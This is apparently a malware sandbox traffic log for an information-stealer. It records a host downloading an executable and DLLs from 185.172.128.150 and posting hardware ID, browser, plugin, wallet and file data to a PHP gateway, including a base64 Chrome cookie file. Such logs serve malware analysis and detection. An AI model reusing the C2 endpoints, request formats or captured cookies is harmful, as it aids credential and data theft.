00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 45 31 33 34 35 34 44 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="hwid"E86E13454DA6894617998------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build"default100------BGHIIJDGHCBFIECBKEGH--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKFHost: 185.172.128.150Content-Length: 6611Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d 0a Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file"------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file"------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="message"wallets------GHCAKKEGCAAFHJJJDBKJ--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"files------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKJJDHCGCAECAAECFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
